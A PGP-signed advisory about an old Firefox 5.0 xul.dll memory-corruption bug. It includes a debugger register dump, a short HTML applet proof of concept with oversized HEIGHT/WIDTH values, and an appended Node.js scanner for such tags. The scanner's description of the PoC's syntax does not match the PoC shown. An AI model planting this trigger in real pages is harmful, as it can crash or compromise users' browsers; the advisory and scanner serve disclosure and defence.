-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
=======================================================================================================
=======================================================================================================
Mozilla Firefox 5.0 xul.dll (ver. 5.0.0.4183) Memory Corruption
Author: shinnai
mail: shinnai[at]autistici[dot]org
site: http://www.shinnai.altervista.org/
This was written for educational purpose. Use it at your own risk.
Author will be not responsible for any damage.
Tested on:
Windows 7 Professional
Info:
It is possible, by assigning the "HEIGHT" and/or "WIDTH" parameter a value between 8193 and 9999999, to
corrupt memory.
Successful exploitation could lead to arbitrary code execution in the context of the current user.
The error is caused by xul!gfxRect::MoveBy
FAULTING_IP:
xul!gfxRect::MoveBy+56e9
6a0a357e 837e0417 cmp dword ptr [esi+4],17h
which leads here in the disassembly:
.text:1059357E cmp dword ptr [esi+4], 17h
and the registers are as follows:
----------------------------------------------------------------
Exception C0000005 (ACCESS_VIOLATION reading [00000004])
----------------------------------------------------------------
EAX=00000001: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
EBX=00000000: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
ECX=084EDEC0: 00 93 C7 6A 00 00 00 00-00 00 00 00 03 00 00 00
EDX=060B0CA0: 58 03 CC 6A 01 00 00 00-FF FF FF FF FF FF FF FF
ESP=001CC9A8: E0 2B 3D 08 64 8E 5E 6A-00 00 00 00 F2 8C 4D 6A
EBP=05308BC0: 30 93 C7 6A 00 00 00 00-00 00 00 00 00 00 00 00
ESI=00000000: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
EDI=084EDEC0: 00 93 C7 6A 00 00 00 00-00 00 00 00 03 00 00 00
EIP=6A5E357E: 83 7E 04 17 75 37 57 56-E8 2E F9 FF FF 59 8D BE
--> CMP DWORD PTR [ESI+04],+17
----------------------------------------------------------------
=======================================================================================================
=======================================================================================================
Proof of concept:
<html>
<head></head>
<body>
<!-- HEIGHT and WIDTH set to 9134752, inside the 8193..9999999 range described above -->
<applet codebase="test" height="9134752" width="9134752"></applet>
</body>
</html>
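As an added defender-side example (not part of shinnai's advisory and not Mozilla code): a small Node.js scanner that flags <applet> tags whose HEIGHT or WIDTH attribute falls in the range the advisory reports, 8193 to 9999999. It is the kind of rule a content filter, proxy or log-triage script could apply while a fix is pending, and it tolerates the unquoted, space-padded attribute syntax used in the proof of concept above. The attribute parser, the function names and the three sample documents are constructed for this example.

```javascript
// Added example: flag <applet> tags whose HEIGHT/WIDTH value lies in the
// range the advisory names (8193..9999999). Constructed for illustration;
// not code from the advisory or from Mozilla.

const UNSAFE_MIN = 8193;     // smallest value the advisory reports as triggering corruption
const UNSAFE_MAX = 9999999;  // largest value the advisory reports

// Parse the attribute portion of one tag, e.g. 'codebase = test height = 9134752'.
// Accepts double-quoted, single-quoted and unquoted values and whitespace
// around '=', so the PoC's loose syntax is handled. Names are lower-cased.
function parseAttributes(tagBody) {
  const attrs = {};
  const re = /([a-zA-Z_:][-a-zA-Z0-9_:.]*)\s*(?:=\s*("([^"]*)"|'([^']*)'|([^\s"'>]+)))?/g;
  let m;
  while ((m = re.exec(tagBody)) !== null) {
    const name = m[1].toLowerCase();
    let value = "";
    if (m[3] !== undefined) value = m[3];
    else if (m[4] !== undefined) value = m[4];
    else if (m[5] !== undefined) value = m[5];
    attrs[name] = value;
  }
  return attrs;
}

// Interpret a dimension attribute as a plain decimal integer. Anything else
// (missing, percentage, garbage) yields null and is not flagged by this rule.
function parseDimension(value) {
  if (value === undefined) return null;
  const trimmed = value.trim();
  if (!/^\d+$/.test(trimmed)) return null;
  return parseInt(trimmed, 10);
}

function isUnsafeDimension(n) {
  return n !== null && n >= UNSAFE_MIN && n <= UNSAFE_MAX;
}

// Scan an HTML string for <applet ...> tags and report each height/width
// attribute in the unsafe range, with the tag's byte offset for triage.
function findUnsafeApplets(html) {
  const findings = [];
  const tagRe = /<applet\b([^>]*)>/gi;
  let m;
  while ((m = tagRe.exec(html)) !== null) {
    const attrs = parseAttributes(m[1]);
    for (const attrName of ["height", "width"]) {
      const n = parseDimension(attrs[attrName]);
      if (isUnsafeDimension(n)) {
        findings.push({ offset: m.index, attribute: attrName, value: n });
      }
    }
  }
  return findings;
}

// Constructed samples: the PoC's shape, a benign applet, and a boundary case
// where height is just below the range and width is exactly at its lower edge.
const SAMPLE_POC = '<html><head><applet codebase = test height = 9134752 width = 9134752></head></html>';
const SAMPLE_BENIGN = '<html><body><applet code="Hello.class" height="300" width="400"></applet></body></html>';
const SAMPLE_BOUNDARY = '<applet code="x" height="8192" width="8193">';

// Run the rule over the samples and return the results keyed by label.
function scanSamples() {
  return {
    poc: findUnsafeApplets(SAMPLE_POC),
    benign: findUnsafeApplets(SAMPLE_BENIGN),
    boundary: findUnsafeApplets(SAMPLE_BOUNDARY),
  };
}

console.log(JSON.stringify(scanSamples(), null, 2));
```

The PoC sample yields two findings (height and width), the benign document none, and the boundary sample exactly one (width 8193); 8192 is deliberately left unflagged because the advisory only reports the range starting at 8193.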
=======================================================================================================
=======================================================================================================
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.11 (MingW32)

=AMPD
-----END PGP SIGNATURE-----